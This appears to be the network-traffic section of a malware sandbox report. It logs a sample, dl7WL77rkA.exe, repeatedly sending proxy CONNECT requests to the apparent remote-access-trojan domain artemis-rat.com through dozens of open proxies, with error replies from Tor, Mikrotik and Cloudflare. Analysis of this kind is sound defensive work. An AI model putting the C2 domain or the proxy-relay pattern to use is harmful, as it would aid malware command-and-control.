                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2098192.168.2.554356123.241.210.123803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.906979084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.092408895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.202094078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.202137947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2099192.168.2.55548360.188.102.225180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.915877104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2100192.168.2.552622132.148.128.88266063876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.068006992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.217588902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2101192.168.2.55452491.241.217.5890903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.077931881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2102192.168.2.554535199.229.254.12941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.077934027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2103192.168.2.55459451.15.139.15163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.091886997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.092709064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.605850935 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2104192.168.2.55457582.223.121.72271373876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.626099110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.701931000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.702076912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.701881886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2105192.168.2.555487185.101.16.52803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.626393080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2106192.168.2.554631190.104.20.8280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.626585007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2107192.168.2.55548845.11.95.16552193876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.629548073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2108192.168.2.55475272.167.221.145420433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.788564920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2109192.168.2.554710162.240.239.103427713876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.794888973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905008078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2110192.168.2.552527128.199.165.63490933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.804311991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2111192.168.2.554768175.213.76.24803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.807193995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.110829115 CET166IN
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2112192.168.2.55546847.229.171.15031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.810447931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.592629910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2113192.168.2.55261962.171.133.6631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.811341047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.387465954 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2114192.168.2.555448102.132.48.6080803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:50.821290016 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2115192.168.2.554748103.66.232.16941453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:50.821599960 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2116192.168.2.552749163.172.149.133163793876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:50.822684050 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.905062914 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.921617031 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:03.010808945 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2117192.168.2.55482851.158.72.165163793876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:50.823415995 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.905056000 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.792881012 CET | 729 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2118192.168.2.554900121.128.194.154803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:50.823529959 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2119192.168.2.55489058.75.126.23541453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:50.823622942 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2120192.168.2.55548072.37.217.341453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:50.824636936 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2121192.168.2.555490212.108.155.20590903876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:50.831319094 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2122192.168.2.552841181.78.11.2179993876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:50.841247082 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2123192.168.2.55549293.87.49.8680803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:50.841284990 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.175107002 CET | 202 | IN | HTTP/1.0 404 Not Found
Content-Length: 715
Content-Type: text/html
Date: Mon, 11 Mar 2024 02:30:50 GMT
Expires: Mon, 11 Mar 2024 02:30:50 GMT
Server: Mikrotik HttpProxy
Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2124192.168.2.555047162.214.121.173643823876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:50.851054907 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.405066967 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2125192.168.2.555348185.212.60.62803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:50.851721048 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.203687906 CET  316  IN  HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:51 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2126192.168.2.552900162.241.50.179481563876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:50.854913950 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.905060053 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2127192.168.2.55500038.49.143.11480803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:50.888017893 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.167880058 CET  202  IN  HTTP/1.0 404 Not Found
Content-Length: 718
Content-Type: text/html
Date: Mon, 11 Mar 2024 02:30:54 GMT
Expires: Mon, 11 Mar 2024 02:30:54 GMT
Server: Mikrotik HttpProxy
Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2128192.168.2.555495196.20.125.12980833876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:50.888091087 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


